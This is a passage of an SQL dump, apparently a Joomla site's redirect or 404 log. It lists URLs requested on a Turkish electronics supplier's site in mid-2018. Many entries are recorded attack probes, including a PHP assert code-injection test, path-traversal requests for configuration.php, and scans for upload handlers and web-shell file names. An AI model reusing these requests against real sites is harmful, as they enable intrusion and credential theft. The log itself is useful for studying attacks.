00:00:00',301),(20456,'http://www.3s-technologies.com.tr/en/images/mirae/1226656899.jpg',NULL,'http://www.3s-technologies.com.tr/en/products-en/smd-ultra-h%C4%B1z/mx200lp-3-detail','',2,0,'2018-07-18 13:24:29','0000-00-00 00:00:00',301),(20457,'http://3s-technologies.com.tr/tr/modules/mod_feed/tmpl/mod_feed.php?ms-load=yjk5hg',NULL,'','',6,0,'2018-07-18 17:14:04','0000-00-00 00:00:00',301),(20458,'http://3s-technologies.com.tr/tr/wp-load.php',NULL,'','',159,0,'2018-07-18 17:30:24','0000-00-00 00:00:00',301),(20459,'http://3s-technologies.com.tr/tr/media/media.php?1=assert&2=die(pi()*42);',NULL,'','',5,0,'2018-07-18 19:12:21','0000-00-00 00:00:00',301),(20460,'http://3s-technologies.com.tr/cache/cachee.php',NULL,'','',5,0,'2018-07-19 18:01:28','0000-00-00 00:00:00',301),(20461,'http://www.3s-technologies.com.tr/tr//connectors/system/phpthumb.php',NULL,'','',14,0,'2018-07-19 21:58:02','0000-00-00 00:00:00',301),(20462,'http://www.3s-technologies.com.tr/tr//dbs.php',NULL,'','',14,0,'2018-07-19 21:58:02','0000-00-00 00:00:00',301),(20463,'http://3s-technologies.com.tr/search.php',NULL,'','',16,0,'2018-07-19 22:37:40','0000-00-00 00:00:00',301),(20464,'http://3s-technologies.com.tr/tr/wp-content/plugins/s3-video/includes/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/s3-video/includes/uploadify.css','',1,0,'2018-07-20 03:43:05','0000-00-00 00:00:00',301),(20465,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/dirdesc',NULL,'','',15,0,'2018-07-20 04:18:32','0000-00-00 00:00:00',301),(20466,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,1-50',NULL,'','',19,0,'2018-07-20 04:19:24','0000-00-00 00:00:00',301),(20467,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/kester',NULL,'','',13,0,'2018-07-20 04:20:37','0000-00-00 00:00:00',301),(20468,'http://3s-technologies.com.tr/en/wp-content/plugins/s3-video/includes/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/s3-video/includes/uploadify.css','',1,0,'2018-07-20 06:40:38','0000-00-00 00:00:00',301),(20469,'http://www.3s-technologies.com.tr/en/components/com_foxcontact/log.php',NULL,'http://www.3s-technologies.com.tr/components/com_foxcontact/log.php','',1,0,'2018-07-20 18:25:15','0000-00-00 00:00:00',301),(20470,'http://www.3s-technologies.com.tr/en/idx.php',NULL,'http://www.3s-technologies.com.tr/idx.php','',1,0,'2018-07-20 18:26:25','0000-00-00 00:00:00',301),(20471,'http://3s-technologies.com.tr/tr/assets/super_admin/vendor/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/assets/super_admin/vendor/jquery-file-upload/server/php/','',2,0,'2018-07-21 04:19:43','0000-00-00 00:00:00',301),(20472,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/rh2-detail',NULL,'','',6,0,'2018-07-21 06:46:12','0000-00-00 00:00:00',301),(20473,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/avb-detail',NULL,'','',4,0,'2018-07-21 06:46:18','0000-00-00 00:00:00',301),(20474,'http://3s-technologies.com.tr/yt.php',NULL,'','',7,0,'2018-07-21 09:35:13','0000-00-00 00:00:00',301),(20475,'http://3s-technologies.com.tr/wp-logos.php',NULL,'','',6,0,'2018-07-21 11:15:41','0000-00-00 00:00:00',301),(20476,'http://3s-technologies.com.tr/temp.php',NULL,'','',7,0,'2018-07-21 13:23:51','0000-00-00 00:00:00',301),(20477,'http://3s-technologies.com.tr/wp-icoud.php',NULL,'','',7,0,'2018-07-21 15:26:32','0000-00-00 00:00:00',301),(20478,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-50?language=tr-tr',NULL,'','',1,0,'2018-07-21 22:38:28','0000-00-00 00:00:00',301),(20479,'http://3s-technologies.com.tr/tr/administrator/content-comments.min.php?good=1',NULL,'','',5,0,'2018-07-22 00:04:34','0000-00-00 00:00:00',301),(20480,'http://3s-technologies.com.tr/ytt.php',NULL,'','',7,0,'2018-07-22 00:13:58','0000-00-00 00:00:00',301),(20481,'http://3s-technologies.com.tr/up.php',NULL,'','',6,0,'2018-07-22 01:52:05','0000-00-00 00:00:00',301),(20482,'http://3s-technologies.com.tr/wp-cahce.php',NULL,'','',7,0,'2018-07-22 03:47:37','0000-00-00 00:00:00',301),(20483,'http://3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/index.php',NULL,'http://3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/index.php','',16,0,'2018-07-22 06:09:29','0000-00-00 00:00:00',301),(20484,'http://3s-technologies.com.tr/en/components/com_creativecontactform/fileupload/index.php',NULL,'http://3s-technologies.com.tr/components/com_creativecontactform/fileupload/index.php','',8,0,'2018-07-22 07:46:38','0000-00-00 00:00:00',301),(20485,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-10?language=tr-tr',NULL,'','',1,0,'2018-07-22 07:47:01','0000-00-00 00:00:00',301),(20486,'http://3s-technologies.com.tr/tr/administrator/templates/isis/ext.php',NULL,'','',5,0,'2018-07-22 10:00:30','0000-00-00 00:00:00',301),(20487,'http://3s-technologies.com.tr/tr/hook-filters.php',NULL,'','',5,0,'2018-07-22 13:42:18','0000-00-00 00:00:00',301),(20488,'http://www.3s-technologies.com.tr/en/plugins/logo_img.php',NULL,'http://www.3s-technologies.com.tr/plugins/logo_img.php','',1,0,'2018-07-22 15:45:23','0000-00-00 00:00:00',301),(20489,'http://www.3s-technologies.com.tr/en/administrator/logo_img.php',NULL,'http://www.3s-technologies.com.tr/administrator/logo_img.php','',1,0,'2018-07-22 15:45:28','0000-00-00 00:00:00',301),(20490,'http://www.3s-technologies.com.tr/en/components/logo_img.php',NULL,'http://www.3s-technologies.com.tr/components/logo_img.php','',1,0,'2018-07-22 15:46:34','0000-00-00 00:00:00',301),(20491,'http://www.3s-technologies.com.tr/en/includes/logo_img.php',NULL,'http://www.3s-technologies.com.tr/includes/logo_img.php','',1,0,'2018-07-22 15:49:02','0000-00-00 00:00:00',301),(20492,'http://3s-technologies.com.tr/indes.php',NULL,'','',6,0,'2018-07-22 17:52:19','0000-00-00 00:00:00',301),(20493,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/dirdesc/results,1-5',NULL,'','',1,0,'2018-07-22 18:32:17','0000-00-00 00:00:00',301),(20494,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/dirdesc/results,1-10',NULL,'','',3,0,'2018-07-22 18:32:41','0000-00-00 00:00:00',301),(20495,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/dirdesc/results,1-50',NULL,'','',3,0,'2018-07-22 18:32:57','0000-00-00 00:00:00',301),(20496,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,1-50',NULL,'','',1,0,'2018-07-22 18:33:06','0000-00-00 00:00:00',301),(20497,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/dirdesc/results,1-20',NULL,'','',1,0,'2018-07-22 18:33:15','0000-00-00 00:00:00',301),(20498,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,1-50',NULL,'','',5,0,'2018-07-22 18:33:25','0000-00-00 00:00:00',301),(20499,'http://3s-technologies.com.tr/wp-cache.php',NULL,'','',12,0,'2018-07-22 19:51:00','0000-00-00 00:00:00',301),(20500,'http://www.3s-technologies.com.tr/tr/platform.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2018-07-22 19:57:47','0000-00-00 00:00:00',301),(20501,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-5?language=tr-tr',NULL,'','',1,0,'2018-07-22 22:55:33','0000-00-00 00:00:00',301),(20502,'http://3s-technologies.com.tr/tr/wp-feed.php',NULL,'','',12,0,'2018-07-23 01:25:45','0000-00-00 00:00:00',301),(20503,'http://3s-technologies.com.tr/tr/wp-logs.php?action=test',NULL,'','',4,0,'2018-07-23 04:00:40','0000-00-00 00:00:00',301),(20504,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/results,1-40',NULL,'','',3,0,'2018-07-23 04:09:07','0000-00-00 00:00:00',301),(20505,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/results,1-100',NULL,'','',1,0,'2018-07-23 04:20:07','0000-00-00 00:00:00',301),(20506,'http://3s-technologies.com.tr/libraries/modules.php',NULL,'','',7,0,'2018-07-23 11:06:34','0000-00-00 00:00:00',301),(20507,'http://3s-technologies.com.tr/tr/js/mage/cookies.js',NULL,'3s-technologies.com.tr','',8,0,'2018-07-23 11:11:58','0000-00-00 00:00:00',301),(20508,'http://3s-technologies.com.tr/tr/wp-rdf.php',NULL,'','',7,0,'2018-07-23 11:15:38','0000-00-00 00:00:00',301),(20509,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-07-23 12:55:14','0000-00-00 00:00:00',301),(20510,'http://3s-technologies.com.tr/lieats.php',NULL,'','',6,0,'2018-07-23 13:56:30','0000-00-00 00:00:00',301),(20511,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-10',NULL,'','',4,0,'2018-07-23 14:35:21','0000-00-00 00:00:00',301),(20512,'http://3s-technologies.com.tr/tr/wp-register.php',NULL,'','',5,0,'2018-07-23 16:28:16','0000-00-00 00:00:00',301),(20513,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-07-23 17:05:33','0000-00-00 00:00:00',301),(20514,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,ordering/results,1-10?language=en-gb',NULL,'','',1,0,'2018-07-23 20:08:11','0000-00-00 00:00:00',301),(20515,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering/results,1-20?language=en-gb',NULL,'','',1,0,'2018-07-23 21:36:14','0000-00-00 00:00:00',301),(20516,'http://3s-technologies.com.tr/tr/cache/ps.php',NULL,'http://3s-technologies.com.tr/tr/cache/ps.php','',1,0,'2018-07-23 22:32:41','0000-00-00 00:00:00',301),(20517,'http://3s-technologies.com.tr/modules/modules.php',NULL,'','',6,0,'2018-07-24 01:35:34','0000-00-00 00:00:00',301),(20518,'http://3s-technologies.com.tr/en/connectors/system/phpthumb.php',NULL,'3s-technologies.com.tr','',2,0,'2018-07-24 02:07:01','0000-00-00 00:00:00',301),(20519,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-07-24 06:41:27','0000-00-00 00:00:00',301),(20520,'http://www.3s-technologies.com.tr/tr/stats/usage_201807.html',NULL,'http://www.3s-technologies.com.tr/tr/stats/usage_201807.html','',1,0,'2018-07-24 13:27:17','0000-00-00 00:00:00',301),(20521,'http://3s-technologies.com.tr/modx.php',NULL,'','',4,0,'2018-07-24 21:11:22','0000-00-00 00:00:00',301),(20522,'http://www.3s-technologies.com.tr/tr/webalizer/usage_201807.html',NULL,'http://www.3s-technologies.com.tr/tr/webalizer/usage_201807.html','',1,0,'2018-07-24 23:46:14','0000-00-00 00:00:00',301),(20523,'http://3s-technologies.com.tr/tr/consystem.php',NULL,'','',5,0,'2018-07-25 01:19:59','0000-00-00 00:00:00',301),(20524,'http://3s-technologies.com.tr/plugins/modules.php',NULL,'','',4,0,'2018-07-25 07:17:03','0000-00-00 00:00:00',301),(20525,'http://3s-technologies.com.tr/tr/wp-caches.php',NULL,'','',10,0,'2018-07-25 07:37:19','0000-00-00 00:00:00',301),(20526,'http://3s-technologies.com.tr/tr//language/en-gb/en-gb.xml',NULL,'','',1,0,'2018-07-25 10:24:50','0000-00-00 00:00:00',301),(20527,'http://3s-technologies.com.tr/tr//application/configs/application.ini',NULL,'','',1,0,'2018-07-25 10:24:55','0000-00-00 00:00:00',301),(20528,'http://3s-technologies.com.tr/tr//readme.txt',NULL,'','',1,0,'2018-07-25 10:24:57','0000-00-00 00:00:00',301),(20529,'http://3s-technologies.com.tr/tr//admin/images/cal_date_over.gif',NULL,'','',1,0,'2018-07-25 10:24:59','0000-00-00 00:00:00',301),(20530,'http://3s-technologies.com.tr/tr//admin/login.php',NULL,'','',1,0,'2018-07-25 10:25:00','0000-00-00 00:00:00',301),(20531,'http://www.3s-technologies.com.tr/tr/plesk-stat/webstat/usage_201807.html',NULL,'http://www.3s-technologies.com.tr/tr/plesk-stat/webstat/usage_201807.html','',1,0,'2018-07-25 18:25:27','0000-00-00 00:00:00',301),(20532,'http://3s-technologies.com.tr/writebab.php',NULL,'','',4,0,'2018-07-25 20:20:15','0000-00-00 00:00:00',301),(20533,'http://3s-technologies.com.tr/smalls.php',NULL,'','',6,0,'2018-07-26 02:42:21','0000-00-00 00:00:00',301),(20534,'http://www.3s-technologies.com.tr/en/manager/index.php',NULL,'http://www.3s-technologies.com.tr/manager/index.php','',2,0,'2018-07-26 06:45:52','0000-00-00 00:00:00',301),(20535,'http://3s-technologies.com.tr/phpinfoer.php',NULL,'','',4,0,'2018-07-26 09:20:32','0000-00-00 00:00:00',301),(20536,'http://www.3s-technologies.com.tr/tr/webstat/2018-07/awstats.www.3s-technologies.com.tr-http.refererpages.html',NULL,'http://www.3s-technologies.com.tr/tr/webstat/2018-07/awstats.www.3s-technologies.com.tr-http.refererpages.html','',1,0,'2018-07-26 10:00:43','0000-00-00 00:00:00',301),(20537,'http://3s-technologies.com.tr/tr/versions.php',NULL,'','',3,0,'2018-07-26 11:46:45','0000-00-00 00:00:00',301),(20538,'http://3s-technologies.com.tr/readme.php',NULL,'','',6,0,'2018-07-26 15:39:25','0000-00-00 00:00:00',301),(20539,'http://3s-technologies.com.tr/images/readmes.php',NULL,'','',6,0,'2018-07-26 19:53:23','0000-00-00 00:00:00',301),(20540,'http://3s-technologies.com.tr/ghfhvvaw.php',NULL,'','',6,0,'2018-07-26 20:07:47','0000-00-00 00:00:00',301),(20541,'http://3s-technologies.com.tr/tr/manager',NULL,'','',3,0,'2018-07-27 00:21:46','0000-00-00 00:00:00',301),(20542,'http://3s-technologies.com.tr/error.php',NULL,'','',7,0,'2018-07-27 02:56:51','0000-00-00 00:00:00',301),(20543,'http://3s-technologies.com.tr/assets/components/gallery/connector.php',NULL,'3s-technologies.com.tr','',1,0,'2018-07-27 03:08:12','0000-00-00 00:00:00',301),(20544,'http://3s-technologies.com.tr/b.php',NULL,'','',6,0,'2018-07-27 05:17:46','0000-00-00 00:00:00',301),(20545,'http://3s-technologies.com.tr/rsau.php',NULL,'','',4,0,'2018-07-27 07:38:07','0000-00-00 00:00:00',301),(20546,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',14,0,'2018-07-27 08:49:55','0000-00-00 00:00:00',301),(20547,'http://3s-technologies.com.tr/tr/show.php?check=1',NULL,'','',4,0,'2018-07-27 10:06:28','0000-00-00 00:00:00',301),(20548,'http://3s-technologies.com.tr/en/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://3s-technologies.com.tr/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',8,0,'2018-07-27 10:48:15','0000-00-00 00:00:00',301),(20549,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/results,1-50?language=en-gb',NULL,'','',2,0,'2018-07-27 11:01:21','0000-00-00 00:00:00',301),(20550,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/aqueous',NULL,'','',12,0,'2018-07-27 11:02:28','0000-00-00 00:00:00',301),(20551,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-50?language=en-gb',NULL,'','',1,0,'2018-07-27 11:06:32','0000-00-00 00:00:00',301),(20552,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-20?language=en-gb',NULL,'','',2,0,'2018-07-27 11:44:35','0000-00-00 00:00:00',301),(20553,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2018-07-27 12:41:58','0000-00-00 00:00:00',301),(20554,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,mf_name/dirdesc/results,6-55',NULL,'','',4,0,'2018-07-27 16:21:55','0000-00-00 00:00:00',301),(20555,'http://3s-technologies.com.tr/tr/kup.php?u=1',NULL,'','',4,0,'2018-07-27 19:22:02','0000-00-00 00:00:00',301),(20556,'http://www.3s-technologies.com.tr/tr/images/m_images/pdf_button.png',NULL,'','',1,0,'2018-07-27 19:34:22','0000-00-00 00:00:00',301),(20557,'http://3s-technologies.com.tr/tr/administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'','',34,0,'2018-07-27 20:18:04','0000-00-00 00:00:00',301),(20558,'http://3s-technologies.com.tr/tr/administrator/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',1,0,'2018-07-28 06:10:08','0000-00-00 00:00:00',301),(20559,'http://3s-technologies.com.tr/tr/wp-cson.php?canshu=1',NULL,'','',3,0,'2018-07-28 07:11:08','0000-00-00 00:00:00',301),(20560,'http://3s-technologies.com.tr/en/administrator/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',1,0,'2018-07-28 08:48:16','0000-00-00 00:00:00',301),(20561,'http://3s-technologies.com.tr/xmlrpc-blog.php',NULL,'','',5,0,'2018-07-28 11:32:58','0000-00-00 00:00:00',301),(20562,'http://3s-technologies.com.tr/camille.php',NULL,'','',5,0,'2018-07-28 15:13:24','0000-00-00 00:00:00',301),(20563,'http://3s-technologies.com.tr/en/wp-includes/js/wpdialog.js',NULL,'3s-technologies.com.tr','',2,0,'2018-07-28 19:48:26','0000-00-00 00:00:00',301),(20564,'http://3s-technologies.com.tr/beck/cron.php',NULL,'','',5,0,'2018-07-28 21:11:14','0000-00-00 00:00:00',301),(20565,'http://3s-technologies.com.tr/tr/unz.php',NULL,'','',4,0,'2018-07-28 23:12:24','0000-00-00 00:00:00',301),(20566,'http://www.3s-technologies.com.tr/tr/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',21,0,'2018-07-29 06:42:22','0000-00-00 00:00:00',301),(20567,'http://www.3s-technologies.com.tr/tr/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',21,0,'2018-07-29 06:42:24','0000-00-00 00:00:00',301),(20568,'http://www.3s-technologies.com.tr/tr/index.php?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',14,0,'2018-07-29 06:42:24','0000-00-00 00:00:00',301),(20569,'http://www.3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',11,0,'2018-07-29 06:42:27','0000-00-00 00:00:00',301),(20570,'http://www.3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload',NULL,'','',13,0,'2018-07-29 06:42:27','0000-00-00 00:00:00',301),(20571,'http://www.3s-technologies.com.tr/tr/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',11,0,'2018-07-29 06:42:28','0000-00-00 00:00:00',301),(20572,'http://www.3s-technologies.com.tr/tr/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',11,0,'2018-07-29 06:42:28','0000-00-00 00:00:00',301),(20573,'http://www.3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',11,0,'2018-07-29 06:42:29','0000-00-00 00:00:00',301),(20574,'http://3s-technologies.com.tr/info.php',NULL,'','',5,0,'2018-07-29 07:32:00','0000-00-00 00:00:00',301),(20575,'http://3s-technologies.com.tr/configurationbak.php',NULL,'','',7,0,'2018-07-29 09:11:33','0000-00-00 00:00:00',301),(20576,'http://3s-technologies.com.tr/tr/wp-includse.php?script=1',NULL,'','',4,0,'2018-07-29 11:10:32','0000-00-00 00:00:00',301),(20577,'http://3s-technologies.com.tr/wp-installation.php',NULL,'','',7,0,'2018-07-29 14:28:12','0000-00-00 00:00:00',301),(20578,'http://3s-technologies.com.tr/trackback.php',NULL,'','',6,0,'2018-07-29 17:35:29','0000-00-00 00:00:00',301),(20579,'http://3s-technologies.com.tr/upgrade.php',NULL,'','',5,0,'2018-07-30 00:28:14','0000-00-00 00:00:00',301),(20580,'http://3s-technologies.com.tr/get.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',5,0,'2018-07-30 02:23:36','0000-00-00 00:00:00',301),(20581,'http://3s-technologies.com.tr/tr/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','',2,0,'2018-07-30 03:37:54','0000-00-00 00:00:00',301),(20582,'http://3s-technologies.com.tr/reade.php',NULL,'','',5,0,'2018-07-30 04:04:26','0000-00-00 00:00:00',301),(20583,'http://3s-technologies.com.tr/en/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','',3,0,'2018-07-30 06:44:46','0000-00-00 00:00:00',301),(20584,'http://3s-technologies.com.tr/test.php',NULL,'','',13,0,'2018-07-30 08:03:23','0000-00-00 00:00:00',301),(20585,'http://3s-technologies.com.tr/sqlibak.php',NULL,'','',6,0,'2018-07-30 11:06:36','0000-00-00 00:00:00',301),(20586,'http://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/component/users?view=registration',NULL,'http://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2','',27,0,'2018-07-30 12:11:21','0000-00-00 00:00:00',301),(20587,'http://3s-technologies.com.tr/tr/wp-kidmx.php?script=1',NULL,'','',3,0,'2018-07-30 17:42:49','0000-00-00 00:00:00',301),(20588,'http://3s-technologies.com.tr/tr/path4.php?testwrite1=1',NULL,'','',2,0,'2018-07-30 19:29:54','0000-00-00 00:00:00',301),(20589,'http://3s-technologies.com.tr/wp-info.php',NULL,'','',6,0,'2018-07-30 21:48:56','0000-00-00 00:00:00',301),(20590,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_name/results,1-5',NULL,'','',1,0,'2018-07-31 02:40:08','0000-00-00 00:00:00',301),(20591,'http://3s-technologies.com.tr/script.php',NULL,'','',5,0,'2018-07-31 11:28:51','0000-00-00 00:00:00',301),(20592,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-150',NULL,'','',2,0,'2018-07-31 12:45:37','0000-00-00 00:00:00',301),(20593,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-60',NULL,'','',2,0,'2018-07-31 12:56:38','0000-00-00 00:00:00',301),(20594,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-15',NULL,'','',2,0,'2018-07-31 13:00:18','0000-00-00 00:00:00',301),(20595,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-30',NULL,'','',2,0,'2018-07-31 13:03:57','0000-00-00 00:00:00',301),(20596,'http://3s-technologies.com.tr/tr/assets/components/gallery/connector.php',NULL,'','',4,0,'2018-08-01 01:07:13','0000-00-00 00:00:00',301),(20597,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/uploadify.css','',1,0,'2018-08-01 04:34:23','0000-00-00 00:00:00',301),(20598,'http://3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/uploadify.css',NULL,'http://3s-technologies.com.tr/components/com_facileforms/libraries/jquery/uploadify.css','',1,0,'2018-08-01 07:23:29','0000-00-00 00:00:00',301),(20599,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-01 17:15:33','0000-00-00 00:00:00',301),(20600,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-01 20:08:37','0000-00-00 00:00:00',301),(20601,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,category_name/results,1-10',NULL,'','',2,0,'2018-08-02 01:09:20','0000-00-00 00:00:00',301),(20602,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,category_name/results,1-50',NULL,'','',1,0,'2018-08-02 01:13:00','0000-00-00 00:00:00',301),(20603,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/dirdesc/results,1-5',NULL,'','',3,0,'2018-08-02 02:00:40','0000-00-00 00:00:00',301),(20604,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/dirdesc/results,1-50',NULL,'','',8,0,'2018-08-02 02:04:20','0000-00-00 00:00:00',301),(20605,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-50?language=en-gb',NULL,'','',6,0,'2018-08-02 02:15:21','0000-00-00 00:00:00',301),(20606,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/dirdesc/results,1-10',NULL,'','',2,0,'2018-08-02 02:26:21','0000-00-00 00:00:00',301),(20607,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-5?language=en-gb',NULL,'','',3,0,'2018-08-02 02:48:21','0000-00-00 00:00:00',301),(20608,'http://3s-technologies.com.tr/tr/components/com_jsmusic/js/uploadify/swfobject.js',NULL,'http://3s-technologies.com.tr/tr/components/com_jsmusic/js/uploadify/swfobject.js','',1,0,'2018-08-02 04:02:59','0000-00-00 00:00:00',301),(20609,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc/results,1-50',NULL,'','',2,0,'2018-08-02 05:37:00','0000-00-00 00:00:00',301),(20610,'http://3s-technologies.com.tr/tr/wp-print.php?script=1',NULL,'','',3,0,'2018-08-02 06:05:52','0000-00-00 00:00:00',301),(20611,'http://3s-technologies.com.tr/en/components/com_jsmusic/js/uploadify/swfobject.js',NULL,'http://3s-technologies.com.tr/components/com_jsmusic/js/uploadify/swfobject.js','',1,0,'2018-08-02 07:09:59','0000-00-00 00:00:00',301),(20612,'http://www.3s-technologies.com.tr/tr/downloader',NULL,'','',1,0,'2018-08-02 09:21:32','0000-00-00 00:00:00',301),(20613,'http://3s-technologies.com.tr/wp-log-7.php',NULL,'','',4,0,'2018-08-02 12:47:11','0000-00-00 00:00:00',301),(20614,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/results,1-10',NULL,'','',4,0,'2018-08-02 14:57:13','0000-00-00 00:00:00',301),(20615,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,category_name/results,1-10',NULL,'','',1,0,'2018-08-02 14:57:15','0000-00-00 00:00:00',301),(20616,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-02 14:57:31','0000-00-00 00:00:00',301),(20617,'http://3s-technologies.com.tr/sys.php.php',NULL,'','',5,0,'2018-08-02 16:36:09','0000-00-00 00:00:00',301),(20618,'http://3s-technologies.com.tr/mobile_detect.php',NULL,'','',5,0,'2018-08-02 18:41:21','0000-00-00 00:00:00',301),(20619,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/dirdesc/results,1-50',NULL,'','',10,0,'2018-08-02 18:54:35','0000-00-00 00:00:00',301),(20620,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-02 19:14:15','0000-00-00 00:00:00',301),(20621,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/results,1-50',NULL,'','',2,0,'2018-08-02 19:17:55','0000-00-00 00:00:00',301),(20622,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,category_name/results,1-50',NULL,'','',1,0,'2018-08-02 19:21:35','0000-00-00 00:00:00',301),(20623,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-30?error=404',NULL,'','',11,0,'2018-08-02 19:47:18','0000-00-00 00:00:00',301),(20624,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-15?error=404',NULL,'','',3,0,'2018-08-02 19:50:58','0000-00-00 00:00:00',301),(20625,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-150?error=404',NULL,'','',9,0,'2018-08-02 20:20:23','0000-00-00 